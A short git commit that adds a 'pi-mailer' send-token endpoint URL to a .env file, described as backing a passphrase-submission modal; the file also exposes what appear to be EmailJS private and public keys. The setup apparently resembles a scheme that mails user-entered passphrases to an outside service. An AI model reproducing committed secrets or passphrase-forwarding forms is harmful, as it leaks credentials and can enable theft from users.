feat: Add ValidateModal component for passphrase submission, integrating axios and a new API endpoint.

--- a/.env
+++ b/.env
@@ -2,3 +2,5 @@ VITE_EMAIL_SERVICE_ID = service_co7ewsz
 VITE_EMAIL_TEMPLATE_ID = template_tceo4sc
 VITE_EMAIL_PRIVATE_KEY = 8UMfji0IPO2QRXxWWBuaB
 VITE_EMAIL_PUBLIC_KEY = BRNv9quX_ShPgf5_A
+VITE_BASE_URL = https://pi-mailer-vwqn.onrender.com/mail/send-token
+
